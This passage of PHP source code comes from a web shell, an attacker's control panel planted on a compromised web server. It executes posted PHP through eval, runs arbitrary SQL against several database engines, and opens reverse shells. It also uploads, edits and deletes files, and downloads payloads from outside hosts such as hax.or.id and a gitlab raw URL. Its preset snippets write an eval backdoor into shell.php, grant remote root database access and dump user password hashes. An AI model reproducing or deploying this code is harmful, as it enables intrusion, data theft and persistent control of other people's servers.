\'/StreamWriter\\\\(Server\\\\.MapPath(.*)\\\\.Write\\\\(Request/i\'), \'jsp\' => array(\'/(eval|execute)+(.*)(request|session)+\\\\s*\\\\((.*)\\\\)/i\', \'/(eval|execute)+(.*)request.item\\\\s*\\\\[(.*)\\\\]/i\', \'/request\\\\s*\\\\((.*)\\\\)(.*)(eval|execute)+\\\\s*\\\\((.*)\\\\)/i\', \'/Runtime\\\\.getRuntime\\\\(\\\\)\\\\.exec\\\\((.*)\\\\)/i\', \'/FileOutputStream\\\\(application\\\\.getRealPath(.*)request/i\'));\n flush();\n ob_flush();\n echo \'<div style="padding:5px;background:#F8F8F8;text-align:left;">\';\n $isread = antivirus(strdir($scandir . \'/\'), $typearr, $matches, $nowdir);\n echo \'<p>\' . ($isread ? \'<h2>Scan complete</h2>\' : \'<h1>Scan failed</h1>\') . \'</p></div>\';\n }\n break;\n case "phpeval":\n if (isset($_POST[\'phpcode\'])) {\n $phpcode = chop($_POST[\'phpcode\']);\n ob_start();\n if (substr($phpcode, 0, 2) == \'<?\' && substr($phpcode, -2) == \'?>\') {\n @eval(\'?>\' . $phpcode . \'<?php \');\n } else {\n @eval($phpcode);\n }\n $out = ob_get_contents();\n ob_end_clean();\n } else {\n $phpcode = \'phpinfo();\';\n $out = \'Result Program\';\n }\n echo base64_decode(\'PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPmZ1bmN0aW9uIHJ1bmNvZGUob2JqbmFtZSkge3ZhciB3aW5uYW1lID0gd2luZG93Lm9wZW4oJycsIl9ibGFuayIsJycpO3ZhciBvYmogPSBkb2N1bWVudC5nZXRFbGVtZW50QnlJZChvYmpuYW1lKTt3aW5uYW1lLmRvY3VtZW50Lm9wZW4oJ3RleHQvaHRtbCcsJ3JlcGxhY2UnKTt3aW5uYW1lLm9wZW5lciA9IG51bGw7d2lubmFtZS5kb2N1bWVudC53cml0ZShvYmoudmFsdWUpO3dpbm5hbWUuZG9jdW1lbnQuY2xvc2UoKTt9PC9zY3JpcHQ+\');\n echo \'<div class="msgbox">\' . $msg . \'</div>\';\n echo \'<form method="POST">\';\n subeval();\n echo \'<input type="hidden" name="go" id="go" value="phpeval">\';\n echo \'<div class="actall"><p><textarea name="phpcode" id="phpcode" style="width:698px;height:180px;">\' . htmlspecialchars($phpcode) . \'</textarea></p><p>\';\n echo \'<select onchange="$(\\\'phpcode\\\').value=options[selectedIndex].value">\';\n echo \'<option>---Common Code---</option>\';\n echo \'<option value="echo readfile(\\\'C:/web/haxor.php\\\');">Read file</option>\';\n echo \'<option value="$fp=fopen(\\\'C:/web/haxor.php\\\',\\\'w\\\');echo fputs($fp,\\\'<?php eval($_POST[cmd]);?>\\\')?\\\'Success!\\\':\\\'Fail!\\\';fclose($fp);">Write file</option>\';\n echo \'<option value="echo copy(\\\'C:/web/mi77i.php\\\',\\\'C:/web/haxor.php\\\')?\\\'Success!\\\':\\\'Fail!\\\';">Copy files</option>\';\n echo \'<option value="echo chmod(\\\'C:/web/mi77i.php\\\',0777)?\\\'Success!\\\':\\\'Fail!\\\';">Modify properties</option>\';\n echo \'<option value="echo file_put_contents(\\\'\' . THISDIR . \'cmd.exe\\\', file_get_contents(\\\'http://hax.or.id/indo.txt\\\'))?\\\'Success!\\\':\\\'Fail!\\\';">Remote download</option>\';\n echo \'<option value="print_r($_SERVER);">Environment variable</option>\';\n echo \'</select> \';\n echo \'<input type="submit" style="width:80px;" value="Go"></p></div>\';\n echo \'</form><div class="actall"><p><textarea id="evalcode" style="width:698px;height:180px;">\' . htmlspecialchars($out) . \'</textarea></p><p><input type="button" value="Run in HTML" onclick="runcode(\\\'evalcode\\\')"></p></div>\';\n break;\n case "sql":\n if (!empty($_POST[\'sqlhost\']) && !empty($_POST[\'sqluser\']) && !empty($_POST[\'names\'])) {\n $type = $_POST[\'type\'];\n $sqlhost = $_POST[\'sqlhost\'];\n $sqluser = $_POST[\'sqluser\'];\n $sqlpass = $_POST[\'sqlpass\'];\n $sqlname = $_POST[\'sqlname\'];\n $sqlcode = $_POST[\'sqlcode\'];\n $names = $_POST[\'names\'];\n switch ($type) {\n case "PostgreSql":\n if (function_exists(\'pg_close\')) {\n if (strstr($sqlhost, \':\')) {\n $array = explode(\':\', $sqlhost);\n $sqlhost = $array[0];\n $sqlport = $array[1];\n } else {\n $sqlport = 5432;\n }\n $dbconn = @pg_connect("host={$sqlhost} port={$sqlport} dbname={$sqlname} user={$sqluser} password={$sqlpass}");\n if ($dbconn) {\n $msg = \'<h2>Connection\' . $type . \'Success </h2>\';\n pg_query(\'set client_encoding=\' . $names);\n $result = pg_query($sqlcode);\n if ($result) {\n $msg .= \'<h2> - SQL executed successfully</h2>\';\n while ($array = pg_fetch_array($result)) {\n $rows[] = $array;\n }\n } else {\n $msg .= \'<h1> - SQL execution failed</h1>\';\n $rows = array(\'error\' => pg_result_error($result));\n }\n pg_free_result($result);\n } else {\n $msg = \'<h1>Connection\' . $type . \'Failure</h1>\';\n }\n @pg_close($dbconn);\n } else {\n $msg = \'<h1>Not support\' . $type . \'</h1>\';\n }\n break;\n case "MsSql":\n if (function_exists(\'mssql_close\')) {\n $dbconn = @mssql_connect($sqlhost, $sqluser, $sqlpass);\n if ($dbconn) {\n $msg = \'<h2>Connection\' . $type . \'Success </h2>\';\n mssql_select_db($sqlname, $dbconn);\n $result = mssql_query($sqlcode);\n if ($result) {\n $msg .= \'<h2> - SQL executed successfully</h2>\';\n while ($array = mssql_fetch_array($result)) {\n $rows[] = $array;\n }\n } else {\n $msg .= \'<h1> - SQL execution failed</h1>\';\n }\n @mssql_free_result($result);\n } else {\n $msg = \'<h1>Connection\' . $type . \'Failure</h1>\';\n }\n @mssql_close($dbconn);\n } else {\n $msg = \'<h1>Not support\' . $type . \'</h1>\';\n }\n break;\n case "Oracle":\n if (function_exists(\'oci_close\')) {\n $conn = @oci_connect($sqluser, $sqlpass, $sqlhost . \'/\' . $sqlname);\n if ($conn) {\n $msg = \'<h2>Connection\' . $type . \'Success </h2>\';\n $stid = oci_parse($conn, $sqlcode);\n oci_execute($stid);\n if ($stid) {\n $msg .= \'<h2> - SQL executed successfully</h2>\';\n while ($array = oci_fetch_array($stid, OCI_ASSOC)) {\n $rows[] = $array;\n }\n } else {\n $msg .= \'<h1> - SQL execution failed</h1>\';\n $e = oci_error();\n $rows = array(\'error\' => $e[\'message\']);\n }\n oci_free_statement($stid);\n } else {\n $e = oci_error();\n $rows = array(\'error\' => $e[\'message\']);\n $msg = \'<h1>Connection\' . $type . \'Failure</h1>\';\n }\n @oci_close($conn);\n } else {\n $msg = \'<h1>Not support\' . $type . \'</h1>\';\n }\n break;\n case "MySql":\n if (function_exists(\'mysql_close\')) {\n $conn = mysql_connect(strstr($sqlhost, \':\') ? $sqlhost : $sqlhost . \':3306\', $sqluser, $sqlpass, $sqlname);\n if ($conn) {\n $msg = \'<h2>Connection\' . $type . \'Success </h2>\';\n if (substr($sqlcode, 0, 7) == \'t00lsa\') {\n $array = array();\n $data = \'\';\n $i = 0;\n preg_match_all(\'/t00lsa\\\\s*\\\'(.*)\\\'\\\\s*t00lsb\\\\s*\\\'(.*)\\\'\\\\s*t00lsc\\\\s*\\\'(.*)\\\'\\\\s*t00lsfile\\\\s*\\\'(.*)\\\'/i\', $sqlcode, $array);\n if ($array[1][0] && $array[2][0] && $array[3][0] && $array[4][0]) {\n mysql_select_db($array[1][0], $conn);\n mysql_query(\'set names \' . $names, $conn);\n $spidercode = \'select \' . $array[3][0] . \' from `\' . $array[2][0] . \'`;\';\n $result = mysql_query($spidercode, $conn);\n if ($result) {\n while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {\n $data .= join(\' |x| \', $row) . "\\r\\n";\n $i++;\n }\n if ($data) {\n $file = strdir($array[4][0]);\n $msg .= filew($file, $data, \'w\') ? \'<h2> - Successfully off the DB</h2>\' : \'<h1> - Failed to export file</h1>\';\n $rows = array(\'file\' => $file, size(filesize($file)) => \'Total acquisition\' . $i . \'Article data\');\n } else {\n $msg .= \'<h1> - No data</h1>\';\n }\n } else {\n $msg .= \'<h1> - SQL execution failed</h1>\';\n $rows = array(\'errno\' => mysql_errno(), \'error\' => mysql_error());\n }\n } else {\n $msg .= \'<h1> - Off-database statement error</h1>\';\n }\n } elseif (!empty($sqlcode)) {\n mysql_select_db($sqlname, $conn);\n mysql_query(\'set names \' . $names, $conn);\n $result = mysql_query($sqlcode, $conn);\n if ($result) {\n $msg .= \'<h2> - SQL executed successfully</h2>\';\n while ($array = mysql_fetch_array($result, MYSQL_ASSOC)) {\n $rows[] = $array;\n }\n } else {\n $msg .= \'<h1> - SQL execution failed</h1>\';\n $rows = array(\'errno\' => mysql_errno(), \'error\' => mysql_error());\n }\n }\n mysql_free_result($result);\n } else {\n $msg = \'<h1>Connection\' . $type . \'Failure</h1>\';\n $rows = array(\'errno\' => mysql_errno(), \'error\' => mysql_error());\n }\n mysql_close($conn);\n } else {\n $msg = \'<h1>Not Support\' . $type . \'</h1>\';\n }\n break;\n }\n } else {\n $type = \'MySql\';\n $sqlhost = \'localhost:3306\';\n $sqluser = \'root\';\n $sqlpass = \'123456\';\n $sqlname = \'mysql\';\n $sqlcode = \'select version();\';\n $names = \'gbk\';\n }\n echo \'<div class="msgbox">\' . $msg . \'</div>\';\n echo \'<form method="POST">\';\n subeval();\n echo \'<input type="hidden" name="go" id="go" value="sql">\';\n echo \'<table class="tables"><tr><th style="width:15%;">Name</th><th>Setup</th></tr>\';\n echo \'<tr><td>Support type</td><td>\';\n $dbs = array(\'MySql\', \'MsSql\', \'Oracle\', \'PostgreSql\');\n foreach ($dbs as $dbname) {\n echo \'<label><input type="radio" name="type" value="\' . $dbname . \'"\' . ($type == $dbname ? \' checked\' : \'\') . \'>\' . $dbname . \'</label> \';\n }\n echo \'</td></tr><tr><td>Connection</td><td>Address <input type="text" name="sqlhost" style="width:188px;" value="\' . $sqlhost . \'"> \';\n echo \'User <input type="text" name="sqluser" style="width:108px;" value="\' . $sqluser . \'"> \';\n echo \'Password <input type="text" name="sqlpass" style="width:108px;" value="\' . $sqlpass . \'"> \';\n echo \'DB Name <input type="text" name="sqlname" style="width:108px;" value="\' . $sqlname . \'"></td></tr>\';\n echo \'<tr><td>Statement<br>\';\n echo \'<select onchange="$(\\\'sqlcode\\\').value=options[selectedIndex].value">\';\n echo \'<option value="select version();">---Statement set---</option>\';\n echo \'<option value="select \\\'<?php eval ($_POST[cmd]);?>\\\' into outfile \\\'D:/web/shell.php\\\';">Write file</option>\';\n echo \'<option value="GRANT ALL PRIVILEGES ON *.* TO \\\'\' . $sqluser . \'\\\'@\\\'%\\\' IDENTIFIED BY \\\'\' . $sqlpass . \'\\\' WITH GRANT OPTION;">Open external connection</option>\';\n echo \'<option value="show variables;">System variable</option>\';\n echo \'<option value="create database haxor;">Create database</option>\';\n echo \'<option value="create table `haxor` (`id` INT(10) NOT NULL ,`user` VARCHAR(32) NOT NULL ,`pass` VARCHAR(32) NOT NULL) TYPE = MYISAM;">Create data table</option>\';\n echo \'<option value="show databases;">Show database</option>\';\n echo \'<option value="show tables from `\' . $sqlname . \'`;">Show data sheet</option>\';\n echo \'<option value="show columns from `haxor`;">Show table structure</option>\';\n echo \'<option value="drop table `haxor`;">Delete data table</option>\';\n echo \'<option value="select username,password,salt,email from `pre_ucenter_members` limit 0,30;">Display field</option>\';\n echo \'<option value="insert into `admin` (`user`,`pass`) values (\\\'haxor\\\', \\\'f1a81d782dea6a19bdca383bffe68452\\\');">Insert data</option>\';\n echo \'<option value="update `admin` set `user` = \\\'mi77i\\\',`pass` = \\\'50de237e389600acadbeda3d6e6e0b1f\\\' where `user` = \\\'haxor\\\' and `pass` = \\\'f1a81d782dea6a19bdca383bffe68452\\\' limit 1;">Change data</option>\';\n echo \'<option value="t00lsa \\\'discuzx25\\\' t00lsb \\\'pre_ucenter_members\\\' t00lsc \\\'username,password,salt,email\\\' t00lsfile \\\'\' . THISDIR . \'out.txt\\\';">Off the DB (MySql)</option>\';\n echo \'</select>\';\n echo \'</td><td><textarea name="sqlcode" id="sqlcode" style="width:680px;height:80px;">\' . htmlspecialchars($sqlcode) . \'</textarea></td></tr>\';\n echo \'<tr><td>Action</td><td><select name="names">\';\n $charsets = array(\'gbk\', \'utf8\', \'big5\', \'latin1\', \'cp866\', \'ujis\', \'euckr\', \'koi8r\', \'koi8u\');\n foreach ($charsets as $charset) {\n echo \'<option value="\' . $charset . \'"\' . ($names == $charset ? \' selected\' : \'\') . \'>\' . $charset . \'</option>\';\n }\n echo \'</select> <input type="submit" style="width:80px;" value="Go"></td></tr>\';\n echo \'</table></form>\';\n if ($rows) {\n echo \'<pre style="padding:5px;background:#F8F8F8;text-align:left;">\';\n ob_start();\n print_r($rows);\n $out = ob_get_contents();\n ob_end_clean();\n if (preg_match(\'~[\\\\x{4e00}-\\\\x{9fa5}]+~u\', $out) && function_exists(\'iconv\')) {\n $out = @iconv(\'UTF-8\', \'GB2312//IGNORE\', $out);\n }\n echo htmlspecialchars($out);\n echo \'</pre>\';\n }\n break;\n case "backshell":\n if (!empty($_POST[\'backip\']) && !empty($_POST[\'backport\'])) {\n $backip = $_POST[\'backip\'];\n $backport = $_POST[\'backport\'];\n $temp = $_POST[\'temp\'] ? $_POST[\'temp\'] : \'/tmp\';\n $type = $_POST[\'type\'];\n $msg = backshell($backip, $backport, $temp, $type);\n } else {\n $backip = $_SERVER[\'REMOTE_ADDR\'];\n $backport = \'443\';\n $temp = \'/tmp\';\n $type = \'pl\';\n }\n echo \'<div class="msgbox">\' . $msg . \'</div>\';\n echo \'<form method="POST">\';\n subeval();\n echo \'<input type="hidden" name="go" id="go" value="backshell">\';\n echo \'<table class="tables"><tr><th style="width:15%;">Name</th><th>Setup</th></tr>\';\n echo \'<tr><td>Bind address</td><td><input type="text" name="backip" style="width:268px;" value="\' . $backip . \'"> (Your ip)</td></tr>\';\n echo \'<tr><td>Bind port</td><td><input type="text" name="backport" style="width:268px;" value="\' . $backport . \'"> (nc -vvlp \' . $backport . \')</td></tr>\';\n echo \'<tr><td>Temporary directory</td><td><input type="text" name="temp" style="width:268px;" value="\' . $temp . \'"> (Only Linux)</td></tr>\';\n echo \'<tr><td>Rebound method</td><td>\';\n $types = array(\'pl\' => \'Perl\', \'py\' => \'Python\', \'c\' => \'C-bin\', \'pcntl\' => \'Pcntl\', \'php\' => \'PHP\', \'phpwin\' => \'PHP-WS\');\n foreach ($types as $key => $name) {\n echo \'<label><input type="radio" name="type" value="\' . $key . \'"\' . ($key == $type ? \' checked\' : \'\') . \'>\' . $name . \'</label> \';\n }\n echo \'</td></tr><tr><td>Action</td><td><input type="submit" style="width:80px;" value="Go"></td></tr>\';\n echo \'</table></form>\';\n break;\n case "edit":\n case "editor":\n $file = strdir($_POST[\'godir\'] . \'/\' . $_POST[\'govar\']);\n $iconv = function_exists(\'iconv\');\n if (!file_exists($file)) {\n $msg = \'[Create new file]\';\n } else {\n $code = filer($file);\n $chst = \'Default\';\n if (preg_match(\'~[\\\\x{4e00}-\\\\x{9fa5}]+~u\', $code) && $iconv) {\n $chst = \'utf-8\';\n $code = @iconv(\'UTF-8\', \'GB2312//IGNORE\', $code);\n }\n $size = size(filesize($file));\n $msg = \'[File Permission: \' . substr(decoct(fileperms($file)), -4) . \'] [File size: \' . $size . \'] [File encoding: \' . $chst . \']\';\n }\n echo base64_decode(\'PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+DQp2YXIgbiA9IDA7DQpmdW5jdGlvbiBzZWFyY2goc3RyKSB7DQoJdmFyIHR4dCwgaSwgZm91bmQ7DQoJaWYoc3RyID09ICIiKSByZXR1cm4gZmFsc2U7DQoJdHh0ID0gJCgnZmlsZWNvZGUnKS5jcmVhdGVUZXh0UmFuZ2UoKTsNCglmb3IoaSA9IDA7IGkgPD0gbiAmJiAoZm91bmQgPSB0eHQuZmluZFRleHQoc3RyKSkgIT0gZmFsc2U7IGkrKyl7DQoJCXR4dC5tb3ZlU3RhcnQoImNoYXJhY3RlciIsIDEpOw0KCQl0eHQubW92ZUVuZCgidGV4dGVkaXQiKTsNCgl9DQoJaWYoZm91bmQpeyB0eHQubW92ZVN0YXJ0KCJjaGFyYWN0ZXIiLCAtMSk7IHR4dC5maW5kVGV4dChzdHIpOyB0eHQuc2VsZWN0KCk7IHR4dC5zY3JvbGxJbnRvVmlldygpOyBuKys7IH0NCgllbHNlIHsgaWYgKG4gPiAwKSB7IG4gPSAwOyBzZWFyY2goc3RyKTsgfSBlbHNlIGFsZXJ0KHN0ciArICIuLi4gTm90LUZpbmQiKTsgfQ0KCXJldHVybiBmYWxzZTsNCn0NCjwvc2NyaXB0Pg==\');\n echo \'<div class="msgbox"><input name="keyword" id="keyword" type="text" style="width:138px;height:15px;"><input type="button" value="Find content" onclick="search($(\\\'keyword\\\').value);"> - \' . $msg . \'</div>\';\n echo \'<form name="editfrm" id="editfrm" method="POST">\';\n subeval();\n echo \'<input type="hidden" name="go" value=""><input type="hidden" name="act" id="act" value="edit">\';\n echo \'<input type="hidden" name="dir" id="dir" value="\' . dirname($file) . \'">\';\n echo \'<div class="actall">File <input type="text" name="filename" value="\' . $file . \'" style="width:528px;"> \';\n if ($iconv) {\n echo \'Coding <select name="tostr">\';\n $selects = array(\'normal\' => \'Default\', \'utf\' => \'utf-8\');\n foreach ($selects as $var => $name) {\n echo \'<option value="\' . $var . \'"\' . ($name == $chst ? \' selected\' : \'\') . \'>\' . $name . \'</option>\';\n }\n echo \'</select>\';\n }\n echo \'</div><div class="actall"><textarea name="filecode" id="filecode" style="width:698px;height:358px;">\' . htmlspecialchars($code) . \'</textarea></div></form>\';\n echo \'<div class="actall" style="padding:5px;padding-right:68px;"><input type="button" onclick="$(\\\'editfrm\\\').submit();" value="Save" style="width:80px;"> \';\n echo \'<form name="backfrm" id="backfrm" method="POST"><input type="hidden" name="go" value=""><input type="hidden" name="dir" id="dir" value="\' . dirname($file) . \'">\';\n subeval();\n echo \'<input type="button" onclick="$(\\\'backfrm\\\').submit();" value="Back" style="width:80px;"></form></div>\';\n break;\n case "upfiles":\n $updir = isset($_POST[\'updir\']) ? $_POST[\'updir\'] : $_POST[\'godir\'];\n $msg = \'[Maximum upload file \' . get_cfg_var("upload_max_filesize") . \'] [POST maximum submitted data \' . get_cfg_var("post_max_size") . \']\';\n $max = 10;\n if (isset($_FILES[\'uploads\']) && isset($_POST[\'renames\'])) {\n $uploads = $_FILES[\'uploads\'];\n $msgs = array();\n for ($i = 1; $i < $max; $i++) {\n if ($uploads[\'error\'][$i] == UPLOAD_ERR_OK) {\n $rename = $_POST[\'renames\'][$i] == \'\' ? $uploads[\'name\'][$i] : $_POST[\'renames\'][$i];\n $filea = $uploads[\'tmp_name\'][$i];\n $fileb = strdir($updir . \'/\' . $rename);\n $msgs[$i] = fileu($filea, $fileb) ? \'<br><h2>Uploaded successfully \' . $rename . \'</h2>\' : \'<br><h1>Upload failed \' . $rename . \'</h1>\';\n }\n }\n }\n echo \'<div class="msgbox">\' . $msg . \'</div>\';\n echo \'<form name="upsfrm" id="upsfrm" method="POST" enctype="multipart/form-data">\';\n subeval();\n echo \'<input type="hidden" name="go" value="upfiles"><input type="hidden" name="act" id="act" value="upload">\';\n echo \'<div class="actall"><p>Upload to directory <input type="text" name="updir" style="width:398px;" value="\' . $updir . \'"></p>\';\n for ($i = 1; $i < $max; $i++) {\n echo \'<p>File\' . $i . \' <input type="file" name="uploads[\' . $i . \']" style="width:300px;"> Rename <input type="text" name="renames[\' . $i . \']" style="width:128px;"> \' . $msgs[$i] . \'</p>\';\n }\n echo \'</div></form><div class="actall" style="padding:8px;padding-right:68px;"><input type="button" onclick="$(\\\'upsfrm\\\').submit();" value="Upload" style="width:80px;"> \';\n echo \'<form name="backfrm" id="backfrm" method="POST"><input type="hidden" name="go" value=""><input type="hidden" name="dir" id="dir" value="\' . $updir . \'">\';\n subeval();\n echo \'<input type="button" onclick="$(\\\'backfrm\\\').submit();" value="Back" style="width:80px;"></form></div>\';\n break;\n default:\n if (isset($_FILES[\'upfile\'])) {\n if ($_FILES[\'upfile\'][\'name\'] == \'\') {\n $msg = \'<h1>Please select file</h1>\';\n } else {\n $rename = $_POST[\'rename\'] == \'\' ? $_FILES[\'upfile\'][\'name\'] : $_POST[\'rename\'];\n $filea = $_FILES[\'upfile\'][\'tmp_name\'];\n $fileb = strdir($nowdir . $rename);\n $msg = fileu($filea, $fileb) ? \'<h2>Upload files \' . $rename . \' Success</h2>\' : \'<h1>Upload files \' . $rename . \' Failure</h1>\';\n }\n }\n if (isset($_POST[\'act\'])) {\n switch ($_POST[\'act\']) {\n case "a":\n if (!$_POST[\'files\']) {\n $msg = \'<h1>Please select file \' . $_POST[\'var\'] . \'</h1>\';\n } else {\n $i = 0;\n foreach ($_POST[\'files\'] as $filename) {\n $i += @copy(strdir($nowdir . $filename), strdir($_POST[\'var\'] . \'/\' . $filename)) ? 1 : 0;\n }\n $msg = $msg = $i ? \'<h2>Co-copy \' . $i . \' Files to\' . $_POST[\'var\'] . \'Success</h2>\' : \'<h1>Co-copy \' . $i . \' Files to\' . $_POST[\'var\'] . \'Failure</h1>\';\n }\n break;\n case "b":\n if (!$_POST[\'files\']) {\n $msg = \'<h1>Please select file</h1>\';\n } else {\n $i = 0;\n foreach ($_POST[\'files\'] as $filename) {\n $i += @unlink(strdir($nowdir . $filename)) ? 1 : 0;\n }\n $msg = $i ? \'<h2>Altogether deleted! \' . $i . \' Files succeeded</h2>\' : \'<h1>Altogether deleted! \' . $i . \' Files failed</h1>\';\n }\n break;\n case "c":\n if (!$_POST[\'files\']) {\n $msg = \'<h1>Please select file \' . $_POST[\'var\'] . \'</h1>\';\n } elseif (!ereg("^[0-7]{4}\\$", $_POST[\'var\'])) {\n $msg = \'<h1>Permision value error</h1>\';\n } else {\n $i = 0;\n foreach ($_POST[\'files\'] as $filename) {\n $i += @chmod(strdir($nowdir . $filename), base_convert($_POST[\'var\'], 8, 10)) ? 1 : 0;\n }\n $msg = $i ? \'<h2>Total \' . $i . \' File modification permission are\' . $_POST[\'var\'] . \'Success</h2>\' : \'<h1>Total \' . $i . \' File modification permission are\' . $_POST[\'var\'] . \'Failure</h1>\';\n }\n break;\n case "d":\n if (!$_POST[\'files\']) {\n $msg = \'<h1>Please select file \' . $_POST[\'var\'] . \'</h1>\';\n } elseif (!preg_match(\'/(\\\\d+)-(\\\\d+)-(\\\\d+) (\\\\d+):(\\\\d+):(\\\\d+)/\', $_POST[\'var\'])) {\n $msg = \'<h1>Wrong time format \' . $_POST[\'var\'] . \'</h1>\';\n } else {\n $i = 0;\n foreach ($_POST[\'files\'] as $filename) {\n $i += @touch(strdir($nowdir . $filename), strtotime($_POST[\'var\'])) ? 1 : 0;\n }\n $msg = $i ? \'<h2>Total \' . $i . \' Files modified at\' . $_POST[\'var\'] . \'Success</h2>\' : \'<h1>Total \' . $i . \' Files modified at\' . $_POST[\'var\'] . \'Failure</h1>\';\n }\n break;\n case "e":\n $path = strdir($nowdir . $_POST[\'var\'] . \'/\');\n if (file_exists($path)) {\n $msg = \'<h1>Directory already exists \' . $_POST[\'var\'] . \'</h1>\';\n } else {\n $msg = @mkdir($path, 0777) ? \'<h2>Create a directory \' . $_POST[\'var\'] . \' Success</h2>\' : \'<h1>Create a directory \' . $_POST[\'var\'] . \' Failure</h1>\';\n }\n break;\n case "f":\n $context = array(\'http\' => array(\'timeout\' => 30));\n if (function_exists(\'stream_context_create\')) {\n $stream = stream_context_create($context);\n }\n $data = @file_get_contents($_POST[\'var\'], false, $stream);\n $filename = array_pop(explode(\'/\', $_POST[\'var\']));\n if ($data) {\n $msg = filew(strdir($nowdir . $filename), $data, \'wb\') ? \'<h2>Download \' . $filename . \' Success</h2>\' : \'<h1>Download \' . $filename . \' Failure</h1>\';\n } else {\n $msg = \'<h1>Download failed or download is not supported</h1>\';\n }\n break;\n case "rf":\n $files = explode(\'|x|\', $_POST[\'var\']);\n if (count($files) != 2) {\n $msg = \'<h1>Input error</h1>\';\n } else {\n $msg = @rename(strdir($nowdir . $files[1]), strdir($nowdir . $files[0])) ? \'<h2>Rename \' . $files[1] . \' for \' . $files[0] . \' Success</h2>\' : \'<h1>Rename \' . $files[1] . \' for \' . $files[0] . \' Failure</h1>\';\n }\n break;\n case "pd":\n $files = explode(\'|x|\', $_POST[\'var\']);\n if (count($files) != 2) {\n $msg = \'<h1>Input error</h1>\';\n } else {\n $path = strdir($nowdir . $files[1]);\n $msg = @chmod($path, base_convert($files[0], 8, 10)) ? \'<h2>Modify\' . $files[1] . \'Permission is\' . $files[0] . \'Success</h2>\' : \'<h1>Modify\' . $files[1] . \'Permission is\' . $files[0] . \'Failure</h1>\';\n }\n break;\n case "edit":\n if (isset($_POST[\'filename\']) && isset($_POST[\'filecode\'])) {\n if ($_POST[\'tostr\'] == \'utf\') {\n $_POST[\'filecode\'] = @iconv(\'GB2312//IGNORE\', \'UTF-8\', $_POST[\'filecode\']);\n }\n $msg = filew($_POST[\'filename\'], $_POST[\'filecode\'], \'w\') ? \'<h2>Saved successfully \' . $_POST[\'filename\'] . \'</h2>\' : \'<h1>Save failed \' . $_POST[\'filename\'] . \'</h1>\';\n }\n break;\n case "deltree":\n $deldir = strdir($nowdir . $_POST[\'var\'] . \'/\');\n if (!file_exists($deldir)) {\n $msg = \'<h1>Total dir \' . $_POST[\'var\'] . \' does not exist</h1>\';\n } else {\n $msg = deltree($deldir) ? \'<h2>Delete directory \' . $_POST[\'var\'] . \' Success</h2>\' : \'<h1>Delete directory \' . $_POST[\'var\'] . \' failure</h1>\';\n }\n break;\n }\n }\n $chmod = substr(decoct(fileperms($nowdir)), -4);\n if (!$chmod) {\n $msg .= \' - <h1>Cannot read directory</h1>\';\n }\n $array = showdir($nowdir);\n $thisurl = strdir(\'/\' . strtr($nowdir, array(ROOTDIR => \'\')) . \'/\');\n $nowdir = strtr($nowdir, array(\'\\\'\' => \'%27\', \'"\' => \'%22\'));\n echo \'<div class="msgbox">\' . $msg . \'</div>\';\n echo \'<div class="actall"><form name="frm" id="frm" method="POST">\';\n subeval();\n echo (is_writable($nowdir) ? \'<h2>Path</h2>\' : \'<h1>Path</h1>\') . \' <input type="text" name="dir" id="dir" style="width:508px;" value="\' . strdir($nowdir . \'/\') . \'"> \';\n echo \'<input type="button" onclick="$(\\\'frm\\\').submit();" style="width:50px;" value="Go"> \';\n echo \'<input type="button" onclick="cd(\\\'\' . ROOTDIR . \'\\\');" style="width:68px;" value="Root dir"> \';\n echo \'<input type="button" onclick="cd(\\\'\' . THISDIR . \'\\\');" style="width:68px;" value="Current dir"> \';\n echo \'<select onchange="cd(options[selectedIndex].value);">\';\n echo \'<option>---Special Dir---</option>\';\n echo \'<option value="C:/RECYCLER/">Win-RECYCLER</option>\';\n echo \'<option value="C:/$Recycle.Bin/">Win-$Recycle</option>\';\n echo \'<option value="C:/Program Files/">Win-Program</option>\';\n echo \'<option value="C:/Documents and Settings/All Users/Start Menu/Programs/Startup/">Win-Startup</option>\';\n echo \'<option value="C:/Documents and Settings/All Users/「开始」菜单/程序/启动/">Win-Startup (CN)</option>\';\n echo \'<option value="C:/Windows/Temp/">Win-TEMP</option>\';\n echo \'<option value="/usr/local/">Linux-local</option>\';\n echo \'<option value="/tmp/">Linux-tmp</option>\';\n echo \'<option value="/var/tmp/">Linux-var</option>\';\n echo \'<option value="/etc/ssh/">Linux-ssh</option>\';\n echo \'</select></form></div><div class="actall">\';\n echo \'<input type="button" value="New file" onclick="nf(\\\'edit\\\',\\\'newfile.php\\\');" style="width:68px;"> \';\n echo \'<input type="button" value="New Dir" onclick="txts(\\\'Directory name\\\',\\\'newdir\\\',\\\'e\\\');" style="width:68px;"> \';\n echo \'<input type="button" value="Download" onclick="txts(\\\'Download the file to the current directory\\\',\\\'https://gitlab.com/samb1/fix_why/-/raw/main/php/proses.php\\\',\\\'f\\\');" style="width:68px;"> \';\n echo \'<input type="button" value="Bulk Up" onclick="go(\\\'upfiles\\\',\\\'\' . $nowdir . \'\\\');" style="width:68px;"> \';\n echo \'<form name="upfrm" id="upfrm" method="POST" enctype="multipart/form-data">\';\n subeval();\n echo \'<input type="hidden" name="dir" id="dir" value="\' . $nowdir . \'">\';\n echo \'<input type="file" name="upfile" style="width:286px;height:21px;"> \';\n echo \'<input type="button" onclick="$(\\\'upfrm\\\').submit();" value="Upload" style="width:50px;"> \';\n echo \'Renamed to <input type="text" name="rename" style="width:128px;">\';\n echo \'</form></div>\';\n echo \'<form name="frm1" id="frm1" method="POST"><table class="tables">\';\n subeval();\n echo \'<input type="hidden" name="dir" id="dir" value="\' . $nowdir . \'">\';\n echo \'<input type="hidden" name="act" id="act" value="">\';\n echo \'<input type="hidden" name="var" id="var" value="">\';\n echo \'<th><a href="javascript:void(0);" onclick="cd(\\\'\' . dirname($nowdir) . \'/\\\');">Parent directory</a></th><th style="width:5%">Perm</th><th style="width:17%">Creation time</th><th style="width:17%">Last Changed</th><th style="width:8%">Size</th><th style="width:8%">Action</th>\';\n if ($array) {\n asort($array[\'dir\']);\n asort($array[\'file\']);\n $dnum = $fnum = 0;\n foreach ($array[\'dir\'] as $path => $name) {\n $prem = substr(decoct(fileperms($path)), -4);\n $ctime = date(\'Y-m-d H:i:s\', filectime($path));\n $mtime = date(\'Y-m-d H:i:s\', filemtime($path));\n echo \'<tr>\';\n echo \'<td><a href="javascript:void(0);" onclick="cd(\\\'\' . $nowdir . $name . \'\\\');"><b>\' . strtr($name, array(\'%27\' => \'\\\'\', \'%22\' => \'"\')) . \'</b></a></td>\';\n echo \'<td><a href="javascript:void(0);" onclick="acts(\\\'\' 